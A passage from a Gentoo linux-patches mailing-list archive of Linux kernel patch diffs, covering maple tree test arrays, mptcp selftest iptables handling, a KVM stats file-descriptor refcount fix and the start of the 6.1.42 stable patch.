+ ERASE, 140722999021568, 140737488351231,
+@@ -1464,7 +1465,7 @@ ERASE, 47430432014336, 47430432022527,
+ STORE, 47430432014336, 47430432018431,
+ STORE, 47430432018432, 47430432022527,
+ 	};
+-	unsigned long set7[] = {
++	static const unsigned long set7[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140729808330752, 140737488351231,
+ ERASE, 140729808330752, 140737488351231,
+@@ -1596,7 +1597,7 @@ ERASE, 47439987130368, 47439987138559,
+ STORE, 47439987130368, 47439987134463,
+ STORE, 47439987134464, 47439987138559,
+ 	};
+-	unsigned long set8[] = {
++	static const unsigned long set8[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722482974720, 140737488351231,
+ ERASE, 140722482974720, 140737488351231,
+@@ -1729,7 +1730,7 @@ STORE, 47708488638464, 47708488642559,
+ STORE, 47708488642560, 47708488646655,
+ 	};
+ 
+-	unsigned long set9[] = {
++	static const unsigned long set9[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736427839488, 140737488351231,
+ ERASE, 140736427839488, 140736427839488,
+@@ -5595,7 +5596,7 @@ ERASE, 47906195480576, 47906195480576,
+ STORE, 94641242615808, 94641242750975,
+ 	};
+ 
+-	unsigned long set10[] = {
++	static const unsigned long set10[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736427839488, 140737488351231,
+ ERASE, 140736427839488, 140736427839488,
+@@ -9459,7 +9460,7 @@ STORE, 139726599680000, 139726599684095,
+ ERASE, 47906195480576, 47906195480576,
+ STORE, 94641242615808, 94641242750975,
+ 	};
+-	unsigned long set11[] = {
++	static const unsigned long set11[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140732658499584, 140737488351231,
+ ERASE, 140732658499584, 140732658499584,
+@@ -9485,7 +9486,7 @@ STORE, 140732658565120, 140732658569215,
+ STORE, 140732658552832, 140732658565119,
+ 	};
+ 
+-	unsigned long set12[] = { /* contains 12 values. */
++	static const unsigned long set12[] = { /* contains 12 values. */
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140732658499584, 140737488351231,
+ ERASE, 140732658499584, 140732658499584,
+@@ -9512,7 +9513,7 @@ STORE, 140732658552832, 140732658565119,
+ STORE, 140014592741375, 140014592741375, /* contrived */
+ STORE, 140014592733184, 140014592741376, /* creates first entry retry. */
+ 	};
+-	unsigned long set13[] = {
++	static const unsigned long set13[] = {
+ STORE, 140373516247040, 140373516251135,/*: ffffa2e7b0e10d80 */
+ STORE, 140373516251136, 140373516255231,/*: ffffa2e7b1195d80 */
+ STORE, 140373516255232, 140373516443647,/*: ffffa2e7b0e109c0 */
+@@ -9525,7 +9526,7 @@ STORE, 140373518684160, 140373518688254,/*: ffffa2e7b05fec00 */
+ STORE, 140373518688256, 140373518692351,/*: ffffa2e7bfbdcd80 */
+ STORE, 140373518692352, 140373518696447,/*: ffffa2e7b0749e40 */
+ 	};
+-	unsigned long set14[] = {
++	static const unsigned long set14[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731667996672, 140737488351231,
+ SNULL, 140731668000767, 140737488351231,
+@@ -9809,7 +9810,7 @@ SNULL, 139826136543232, 139826136809471,
+ STORE, 139826136809472, 139826136842239,
+ STORE, 139826136543232, 139826136809471,
+ 	};
+-	unsigned long set15[] = {
++	static const unsigned long set15[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722061451264, 140737488351231,
+ SNULL, 140722061455359, 140737488351231,
+@@ -10094,7 +10095,7 @@ STORE, 139906808958976, 139906808991743,
+ STORE, 139906808692736, 139906808958975,
+ 	};
+ 
+-	unsigned long set16[] = {
++	static const unsigned long set16[] = {
+ STORE, 94174808662016, 94174809321471,
+ STORE, 94174811414528, 94174811426815,
+ STORE, 94174811426816, 94174811430911,
+@@ -10305,7 +10306,7 @@ STORE, 139921865613312, 139921865617407,
+ STORE, 139921865547776, 139921865564159,
+ 	};
+ 
+-	unsigned long set17[] = {
++	static const unsigned long set17[] = {
+ STORE, 94397057224704, 94397057646591,
+ STORE, 94397057650688, 94397057691647,
+ STORE, 94397057691648, 94397057695743,
+@@ -10367,7 +10368,7 @@ STORE, 140720477511680, 140720477646847,
+ STORE, 140720478302208, 140720478314495,
+ STORE, 140720478314496, 140720478318591,
+ 	};
+-	unsigned long set18[] = {
++	static const unsigned long set18[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140724953673728, 140737488351231,
+ SNULL, 140724953677823, 140737488351231,
+@@ -10400,7 +10401,7 @@ STORE, 140222970597376, 140222970605567,
+ ERASE, 140222970597376, 140222970605567,
+ STORE, 140222970597376, 140222970605567,
+ 	};
+-	unsigned long set19[] = {
++	static const unsigned long set19[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140725182459904, 140737488351231,
+ SNULL, 140725182463999, 140737488351231,
+@@ -10669,7 +10670,7 @@ STORE, 140656836775936, 140656836780031,
+ STORE, 140656787476480, 140656791920639,
+ ERASE, 140656774639616, 140656779083775,
+ 	};
+-	unsigned long set20[] = {
++	static const unsigned long set20[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735952392192, 140737488351231,
+ SNULL, 140735952396287, 140737488351231,
+@@ -10825,7 +10826,7 @@ STORE, 140590386819072, 140590386823167,
+ STORE, 140590386823168, 140590386827263,
+ SNULL, 140590376591359, 140590376595455,
+ 	};
+-	unsigned long set21[] = {
++	static const unsigned long set21[] = {
+ STORE, 93874710941696, 93874711363583,
+ STORE, 93874711367680, 93874711408639,
+ STORE, 93874711408640, 93874711412735,
+@@ -10895,7 +10896,7 @@ ERASE, 140708393312256, 140708393316351,
+ ERASE, 140708393308160, 140708393312255,
+ ERASE, 140708393291776, 140708393308159,
+ 	};
+-	unsigned long set22[] = {
++	static const unsigned long set22[] = {
+ STORE, 93951397134336, 93951397183487,
+ STORE, 93951397183488, 93951397728255,
+ STORE, 93951397728256, 93951397826559,
+@@ -11022,7 +11023,7 @@ STORE, 140551361253376, 140551361519615,
+ ERASE, 140551361253376, 140551361519615,
+ 	};
+ 
+-	unsigned long set23[] = {
++	static const unsigned long set23[] = {
+ STORE, 94014447943680, 94014448156671,
+ STORE, 94014450253824, 94014450257919,
+ STORE, 94014450257920, 94014450266111,
+@@ -14346,7 +14347,7 @@ SNULL, 140175956627455, 140175985139711,
+ STORE, 140175927242752, 140175956627455,
+ STORE, 140175956627456, 140175985139711,
+ 	};
+-	unsigned long set24[] = {
++	static const unsigned long set24[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735281639424, 140737488351231,
+ SNULL, 140735281643519, 140737488351231,
+@@ -15508,7 +15509,7 @@ ERASE, 139635393024000, 139635401412607,
+ ERASE, 139635384627200, 139635384631295,
+ ERASE, 139635384631296, 139635393019903,
+ 	};
+-	unsigned long set25[] = {
++	static const unsigned long set25[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140737488343040, 140737488351231,
+ STORE, 140722547441664, 140737488351231,
+@@ -22296,7 +22297,7 @@ STORE, 140249652703232, 140249682087935,
+ STORE, 140249682087936, 140249710600191,
+ 	};
+ 
+-	unsigned long set26[] = {
++	static const unsigned long set26[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140729464770560, 140737488351231,
+ SNULL, 140729464774655, 140737488351231,
+@@ -22320,7 +22321,7 @@ ERASE, 140109040951296, 140109040959487,
+ STORE, 140109040955392, 140109040959487,
+ ERASE, 140109040955392, 140109040959487,
+ 	};
+-	unsigned long set27[] = {
++	static const unsigned long set27[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140726128070656, 140737488351231,
+ SNULL, 140726128074751, 140737488351231,
+@@ -22716,7 +22717,7 @@ STORE, 140415509696512, 140415535910911,
+ ERASE, 140415537422336, 140415562588159,
+ STORE, 140415482433536, 140415509696511,
+ 	};
+-	unsigned long set28[] = {
++	static const unsigned long set28[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722475622400, 140737488351231,
+ SNULL, 140722475626495, 140737488351231,
+@@ -22784,7 +22785,7 @@ STORE, 139918413348864, 139918413352959,
+ ERASE, 139918413316096, 139918413344767,
+ STORE, 93865848528896, 93865848664063,
+ 	};
+-	unsigned long set29[] = {
++	static const unsigned long set29[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734467944448, 140737488351231,
+ SNULL, 140734467948543, 140737488351231,
+@@ -23659,7 +23660,7 @@ ERASE, 140143079972864, 140143088361471,
+ ERASE, 140143205793792, 140143205797887,
+ ERASE, 140143205797888, 140143214186495,
+ 	};
+-	unsigned long set30[] = {
++	static const unsigned long set30[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140733436743680, 140737488351231,
+ SNULL, 140733436747775, 140737488351231,
+@@ -24541,7 +24542,7 @@ ERASE, 140165225893888, 140165225897983,
+ ERASE, 140165225897984, 140165234286591,
+ ERASE, 140165058105344, 140165058109439,
+ 	};
+-	unsigned long set31[] = {
++	static const unsigned long set31[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730890784768, 140737488351231,
+ SNULL, 140730890788863, 140737488351231,
+@@ -25354,7 +25355,7 @@ ERASE, 140623906590720, 140623914979327,
+ ERASE, 140622950277120, 140622950281215,
+ ERASE, 140622950281216, 140622958669823,
+ 	};
+-	unsigned long set32[] = {
++	static const unsigned long set32[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731244212224, 140737488351231,
+ SNULL, 140731244216319, 140737488351231,
+@@ -26150,7 +26151,7 @@ ERASE, 140400417288192, 140400425676799,
+ ERASE, 140400283066368, 140400283070463,
+ ERASE, 140400283070464, 140400291459071,
+ 	};
+-	unsigned long set33[] = {
++	static const unsigned long set33[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734562918400, 140737488351231,
+ SNULL, 140734562922495, 140737488351231,
+@@ -26292,7 +26293,7 @@ STORE, 140582961786880, 140583003750399,
+ ERASE, 140582961786880, 140583003750399,
+ 	};
+ 
+-	unsigned long set34[] = {
++	static const unsigned long set34[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731327180800, 140737488351231,
+ SNULL, 140731327184895, 140737488351231,
+@@ -27173,7 +27174,7 @@ ERASE, 140012522094592, 140012530483199,
+ ERASE, 140012033142784, 140012033146879,
+ ERASE, 140012033146880, 140012041535487,
+ 	};
+-	unsigned long set35[] = {
++	static const unsigned long set35[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730536939520, 140737488351231,
+ SNULL, 140730536943615, 140737488351231,
+@@ -27930,7 +27931,7 @@ ERASE, 140474471936000, 140474480324607,
+ ERASE, 140474396430336, 140474396434431,
+ ERASE, 140474396434432, 140474404823039,
+ 	};
+-	unsigned long set36[] = {
++	static const unsigned long set36[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140723893125120, 140737488351231,
+ SNULL, 140723893129215, 140737488351231,
+@@ -28791,7 +28792,7 @@ ERASE, 140121890357248, 140121898745855,
+ ERASE, 140121269587968, 140121269592063,
+ ERASE, 140121269592064, 140121277980671,
+ 	};
+-	unsigned long set37[] = {
++	static const unsigned long set37[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722404016128, 140737488351231,
+ SNULL, 140722404020223, 140737488351231,
+@@ -28917,7 +28918,7 @@ STORE, 139759821246464, 139759888355327,
+ ERASE, 139759821246464, 139759888355327,
+ ERASE, 139759888355328, 139759955464191,
+ 	};
+-	unsigned long set38[] = {
++	static const unsigned long set38[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730666221568, 140737488351231,
+ SNULL, 140730666225663, 140737488351231,
+@@ -29727,7 +29728,7 @@ ERASE, 140613504712704, 140613504716799,
+ ERASE, 140613504716800, 140613513105407,
+ 	};
+ 
+-	unsigned long set39[] = {
++	static const unsigned long set39[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736271417344, 140737488351231,
+ SNULL, 140736271421439, 140737488351231,
+@@ -30099,7 +30100,7 @@ STORE, 140325364428800, 140325372821503,
+ STORE, 140325356036096, 140325364428799,
+ SNULL, 140325364432895, 140325372821503,
+ 	};
+-	unsigned long set40[] = {
++	static const unsigned long set40[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734309167104, 140737488351231,
+ SNULL, 140734309171199, 140737488351231,
+@@ -30850,7 +30851,7 @@ ERASE, 140320289300480, 140320289304575,
+ ERASE, 140320289304576, 140320297693183,
+ ERASE, 140320163409920, 140320163414015,
+ 	};
+-	unsigned long set41[] = {
++	static const unsigned long set41[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140728157171712, 140737488351231,
+ SNULL, 140728157175807, 140737488351231,
+@@ -31160,7 +31161,7 @@ STORE, 94376135090176, 94376135094271,
+ STORE, 94376135094272, 94376135098367,
+ SNULL, 94376135094272, 94377208836095,
+ 	};
+-	unsigned long set42[] = {
++	static const unsigned long set42[] = {
+ STORE, 314572800, 1388314623,
+ STORE, 1462157312, 1462169599,
+ STORE, 1462169600, 1462185983,
+@@ -33837,7 +33838,7 @@ SNULL, 3798999040, 3799101439,
+  */
+ 	};
+ 
+-	unsigned long set43[] = {
++	static const unsigned long set43[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734187720704, 140737488351231,
+ SNULL, 140734187724800, 140737488351231,
+@@ -34971,7 +34972,7 @@ void run_check_rcu_slowread(struct maple_tree *mt, struct rcu_test_struct *vals)
+ 	MT_BUG_ON(mt, !vals->seen_entry3);
+ 	MT_BUG_ON(mt, !vals->seen_both);
+ }
+-static noinline void check_rcu_simulated(struct maple_tree *mt)
++static noinline void __init check_rcu_simulated(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 1000;
+ 	unsigned long target = 4320;
+@@ -35132,7 +35133,7 @@ static noinline void check_rcu_simulated(struct maple_tree *mt)
+ 	rcu_unregister_thread();
+ }
+ 
+-static noinline void check_rcu_threaded(struct maple_tree *mt)
++static noinline void __init check_rcu_threaded(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 1000;
+ 	struct rcu_test_struct vals;
+@@ -35341,7 +35342,7 @@ static void check_dfs_preorder(struct maple_tree *mt)
+ /* End of depth first search tests */
+ 
+ /* Preallocation testing */
+-static noinline void check_prealloc(struct maple_tree *mt)
++static noinline void __init check_prealloc(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 100;
+ 	unsigned long allocated;
+@@ -35469,7 +35470,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ /* End of preallocation testing */
+ 
+ /* Spanning writes, writes that span nodes and layers of the tree */
+-static noinline void check_spanning_write(struct maple_tree *mt)
++static noinline void __init check_spanning_write(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 5000;
+ 	MA_STATE(mas, mt, 1200, 2380);
+@@ -35637,7 +35638,7 @@ static noinline void check_spanning_write(struct maple_tree *mt)
+ /* End of spanning write testing */
+ 
+ /* Writes to a NULL area that are adjacent to other NULLs */
+-static noinline void check_null_expand(struct maple_tree *mt)
++static noinline void __init check_null_expand(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 100;
+ 	unsigned char data_end;
+@@ -35698,7 +35699,7 @@ static noinline void check_null_expand(struct maple_tree *mt)
+ /* End of NULL area expansions */
+ 
+ /* Checking for no memory is best done outside the kernel */
+-static noinline void check_nomem(struct maple_tree *mt)
++static noinline void __init check_nomem(struct maple_tree *mt)
+ {
+ 	MA_STATE(ms, mt, 1, 1);
+ 
+@@ -35733,7 +35734,7 @@ static noinline void check_nomem(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_locky(struct maple_tree *mt)
++static noinline void __init check_locky(struct maple_tree *mt)
+ {
+ 	MA_STATE(ms, mt, 2, 2);
+ 	MA_STATE(reader, mt, 2, 2);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 7b65003ee8cff..a3108c3cff471 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -151,9 +151,7 @@ check_tools()
+ 	elif ! iptables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without iptables tool"
+ 		exit $ksft_skip
+-	fi
+-
+-	if ! ip6tables -V &> /dev/null; then
++	elif ! ip6tables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without ip6tables tool"
+ 		exit $ksft_skip
+ 	fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index af4fccd4f5cc0..114c4ce719c78 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -13,13 +13,15 @@ timeout_poll=30
+ timeout_test=$((timeout_poll * 2 + 1))
+ mptcp_connect=""
+ do_all_tests=1
++iptables="iptables"
++ip6tables="ip6tables"
+ 
+ add_mark_rules()
+ {
+ 	local ns=$1
+ 	local m=$2
+ 
+-	for t in iptables ip6tables; do
++	for t in ${iptables} ${ip6tables}; do
+ 		# just to debug: check we have multiple subflows connection requests
+ 		ip netns exec $ns $t -A OUTPUT -p tcp --syn -m mark --mark $m -j ACCEPT
+ 
+@@ -92,14 +94,14 @@ if [ $? -ne 0 ];then
+ 	exit $ksft_skip
+ fi
+ 
+-iptables -V > /dev/null 2>&1
+-if [ $? -ne 0 ];then
++# Use the legacy version if available to support old kernel versions
++if iptables-legacy -V &> /dev/null; then
++	iptables="iptables-legacy"
++	ip6tables="ip6tables-legacy"
++elif ! iptables -V &> /dev/null; then
+ 	echo "SKIP: Could not run all tests without iptables tool"
+ 	exit $ksft_skip
+-fi
+-
+-ip6tables -V > /dev/null 2>&1
+-if [ $? -ne 0 ];then
++elif ! ip6tables -V &> /dev/null; then
+ 	echo "SKIP: Could not run all tests without ip6tables tool"
+ 	exit $ksft_skip
+ fi
+@@ -109,10 +111,10 @@ check_mark()
+ 	local ns=$1
+ 	local af=$2
+ 
+-	tables=iptables
++	tables=${iptables}
+ 
+ 	if [ $af -eq 6 ];then
+-		tables=ip6tables
++		tables=${ip6tables}
+ 	fi
+ 
+ 	counters=$(ip netns exec $ns $tables -v -L OUTPUT | grep DROP)
+@@ -314,8 +316,8 @@ do_tcpinq_tests()
+ {
+ 	local lret=0
+ 
+-	ip netns exec "$ns1" iptables -F
+-	ip netns exec "$ns1" ip6tables -F
++	ip netns exec "$ns1" ${iptables} -F
++	ip netns exec "$ns1" ${ip6tables} -F
+ 
+ 	if ! mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
+ 		echo "INFO: TCP_INQ not supported: SKIP"
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 640113f047efb..8123f4d15930c 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -4032,8 +4032,17 @@ static ssize_t kvm_vcpu_stats_read(struct file *file, char __user *user_buffer,
+ 			sizeof(vcpu->stat), user_buffer, size, offset);
+ }
+ 
++static int kvm_vcpu_stats_release(struct inode *inode, struct file *file)
++{
++	struct kvm_vcpu *vcpu = file->private_data;
++
++	kvm_put_kvm(vcpu->kvm);
++	return 0;
++}
++
+ static const struct file_operations kvm_vcpu_stats_fops = {
+ 	.read = kvm_vcpu_stats_read,
++	.release = kvm_vcpu_stats_release,
+ 	.llseek = noop_llseek,
+ };
+ 
+@@ -4054,6 +4063,9 @@ static int kvm_vcpu_ioctl_get_stats_fd(struct kvm_vcpu *vcpu)
+ 		put_unused_fd(fd);
+ 		return PTR_ERR(file);
+ 	}
++
++	kvm_get_kvm(vcpu->kvm);
++
+ 	file->f_mode |= FMODE_PREAD;
+ 	fd_install(fd, file);
+ 
+@@ -4658,8 +4670,17 @@ static ssize_t kvm_vm_stats_read(struct file *file, char __user *user_buffer,
+ 				sizeof(kvm->stat), user_buffer, size, offset);
+ }
+ 
++static int kvm_vm_stats_release(struct inode *inode, struct file *file)
++{
++	struct kvm *kvm = file->private_data;
++
++	kvm_put_kvm(kvm);
++	return 0;
++}
++
+ static const struct file_operations kvm_vm_stats_fops = {
+ 	.read = kvm_vm_stats_read,
++	.release = kvm_vm_stats_release,
+ 	.llseek = noop_llseek,
+ };
+ 
+@@ -4678,6 +4699,9 @@ static int kvm_vm_ioctl_get_stats_fd(struct kvm *kvm)
+ 		put_unused_fd(fd);
+ 		return PTR_ERR(file);
+ 	}
++
++	kvm_get_kvm(kvm);
++
+ 	file->f_mode |= FMODE_PREAD;
+ 	fd_install(fd, file);
+ 
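
Both kvm hunks above follow the same lifetime rule: a file that stores a pointer in private_data must hold a reference on the pointed-to object for as long as the file exists, taken before fd_install() and dropped in the new .release hook. A standalone sketch with a manual refcount in place of kvm_get_kvm()/kvm_put_kvm():

	#include <stdio.h>

	struct vm { int refcount; };

	static void vm_get(struct vm *vm) { vm->refcount++; }

	static void vm_put(struct vm *vm)
	{
		if (--vm->refcount == 0)
			printf("vm freed\n");
	}

	struct file { struct vm *private_data; };

	static void stats_fd_create(struct file *f, struct vm *vm)
	{
		f->private_data = vm;
		vm_get(vm);			/* pin vm for as long as the fd lives */
	}

	static void stats_fd_release(struct file *f)
	{
		vm_put(f->private_data);	/* mirrors the new .release hook */
	}

	int main(void)
	{
		struct vm vm = { .refcount = 1 };
		struct file f;

		stats_fd_create(&f, &vm);
		vm_put(&vm);			/* owner drops its reference... */
		stats_fd_release(&f);		/* ...vm survives until the fd closes */
		return 0;
	}
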


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-27 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-27 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     7fc5f7e1d44539fdcbdbe79b07208182a3ea5888
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 27 11:47:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 27 11:47:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7fc5f7e1

Linux patch 6.1.42

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1041_linux-6.1.42.patch | 9816 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9820 insertions(+)

diff --git a/0000_README b/0000_README
index 3a1ce4bc..e4fa9ccf 100644
--- a/0000_README
+++ b/0000_README
@@ -207,6 +207,10 @@ Patch:  1040_linux-6.1.41.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.41
 
+Patch:  1041_linux-6.1.42.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.42
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1041_linux-6.1.42.patch b/1041_linux-6.1.42.patch
new file mode 100644
index 00000000..4508ec48
--- /dev/null
+++ b/1041_linux-6.1.42.patch
@@ -0,0 +1,9816 @@
+diff --git a/Documentation/accounting/psi.rst b/Documentation/accounting/psi.rst
+index 5e40b3f437f90..df6062eb3abbc 100644
+--- a/Documentation/accounting/psi.rst
++++ b/Documentation/accounting/psi.rst
+@@ -105,6 +105,10 @@ prevent overly frequent polling. Max limit is chosen as a high enough number
+ after which monitors are most likely not needed and psi averages can be used
+ instead.
+ 
++Unprivileged users can also create monitors, with the only limitation that the
++window size must be a multiple of 2s, in order to prevent excessive resource
++usage.
++
+ When activated, psi monitor stays active for at least the duration of one
+ tracking window to avoid repeated activations/deactivations when system is
+ bouncing in and out of the stall state.
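
The psi.rst addition above documents a simple arithmetic rule: unprivileged monitor windows must be whole multiples of two seconds. A standalone sketch of just that check (the kernel's actual window bounds and error codes are not reproduced here):

	#include <stdbool.h>
	#include <stdio.h>

	#define USEC_PER_SEC 1000000UL

	static bool unpriv_window_ok(unsigned long window_us)
	{
		return window_us && window_us % (2 * USEC_PER_SEC) == 0;
	}

	int main(void)
	{
		printf("%d %d\n", unpriv_window_ok(4 * USEC_PER_SEC),	/* 1 */
				  unpriv_window_ok(3 * USEC_PER_SEC));	/* 0 */
		return 0;
	}
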
+diff --git a/Makefile b/Makefile
+index 6c940cce3656a..b569bed800521 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 41
++SUBLEVEL = 42
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 23834d96d1e78..656f613bacf7a 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -803,6 +803,8 @@ void sve_sync_from_fpsimd_zeropad(struct task_struct *task)
+ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 			  unsigned long vl, unsigned long flags)
+ {
++	bool free_sme = false;
++
+ 	if (flags & ~(unsigned long)(PR_SVE_VL_INHERIT |
+ 				     PR_SVE_SET_VL_ONEXEC))
+ 		return -EINVAL;
+@@ -851,21 +853,36 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	    thread_sm_enabled(&task->thread))
+ 		sve_to_fpsimd(task);
+ 
+-	if (system_supports_sme() && type == ARM64_VEC_SME) {
+-		task->thread.svcr &= ~(SVCR_SM_MASK |
+-				       SVCR_ZA_MASK);
+-		clear_thread_flag(TIF_SME);
++	if (system_supports_sme()) {
++		if (type == ARM64_VEC_SME ||
++		    !(task->thread.svcr & (SVCR_SM_MASK | SVCR_ZA_MASK))) {
++			/*
++			 * We are changing the SME VL or weren't using
++			 * SME anyway, discard the state and force a
++			 * reallocation.
++			 */
++			task->thread.svcr &= ~(SVCR_SM_MASK |
++					       SVCR_ZA_MASK);
++			clear_thread_flag(TIF_SME);
++			free_sme = true;
++		}
+ 	}
+ 
+ 	if (task == current)
+ 		put_cpu_fpsimd_context();
+ 
+ 	/*
+-	 * Force reallocation of task SVE and SME state to the correct
+-	 * size on next use:
++	 * Free the changed states if they are not in use, SME will be
++	 * reallocated to the correct size on next use and we just
++	 * allocate SVE now in case it is needed for use in streaming
++	 * mode.
+ 	 */
+-	sve_free(task);
+-	if (system_supports_sme() && type == ARM64_VEC_SME)
++	if (system_supports_sve()) {
++		sve_free(task);
++		sve_alloc(task, true);
++	}
++
++	if (free_sme)
+ 		sme_free(task);
+ 
+ 	task_set_vl(task, type, vl);
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 8f16217c111c8..14134fd34ff79 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -322,7 +322,13 @@ static int build_prologue(struct jit_ctx *ctx, bool ebpf_from_cbpf)
+ 	 *
+ 	 */
+ 
+-	emit_bti(A64_BTI_C, ctx);
++	/* bpf function may be invoked by 3 instruction types:
++	 * 1. bl, attached via freplace to bpf prog via short jump
++	 * 2. br, attached via freplace to bpf prog via long jump
++	 * 3. blr, working as a function pointer, used by emit_call.
++	 * So BTI_JC should used here to support both br and blr.
++	 */
++	emit_bti(A64_BTI_JC, ctx);
+ 
+ 	emit(A64_MOV(1, A64_R(9), A64_LR), ctx);
+ 	emit(A64_NOP, ctx);
+diff --git a/arch/mips/include/asm/dec/prom.h b/arch/mips/include/asm/dec/prom.h
+index 1e1247add1cf8..908e96e3a3117 100644
+--- a/arch/mips/include/asm/dec/prom.h
++++ b/arch/mips/include/asm/dec/prom.h
+@@ -70,7 +70,7 @@ static inline bool prom_is_rex(u32 magic)
+  */
+ typedef struct {
+ 	int pagesize;
+-	unsigned char bitmap[0];
++	unsigned char bitmap[];
+ } memmap;
+ 
+ 
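The one-line prom.h change above swaps a zero-length array (an old GNU extension) for a C99 flexible array member, which lets the compiler and fortified string routines bounds-check the trailing buffer. A minimal userspace illustration of the same idiom (struct name and sizes hypothetical):

#include <stdlib.h>
#include <string.h>

/* Same layout trick as the memmap struct above: a fixed header
 * followed by a trailing buffer sized at allocation time. */
struct memmap_like {
	int pagesize;
	unsigned char bitmap[];	/* C99 flexible array member */
};

int main(void)
{
	size_t nbytes = 64;
	struct memmap_like *m = malloc(sizeof(*m) + nbytes);

	if (!m)
		return 1;
	m->pagesize = 4096;
	memset(m->bitmap, 0, nbytes);	/* in-bounds for fortify checks */
	free(m);
	return 0;
}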
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b6d429a2bcb62..707d6811615b8 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -510,6 +510,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Dell Studio 1569 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Studio 1569"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 3830TG */
+diff --git a/drivers/base/regmap/regmap-i2c.c b/drivers/base/regmap/regmap-i2c.c
+index 980e5ce6a3a35..3ec611dc0c09f 100644
+--- a/drivers/base/regmap/regmap-i2c.c
++++ b/drivers/base/regmap/regmap-i2c.c
+@@ -242,8 +242,8 @@ static int regmap_i2c_smbus_i2c_read(void *context, const void *reg,
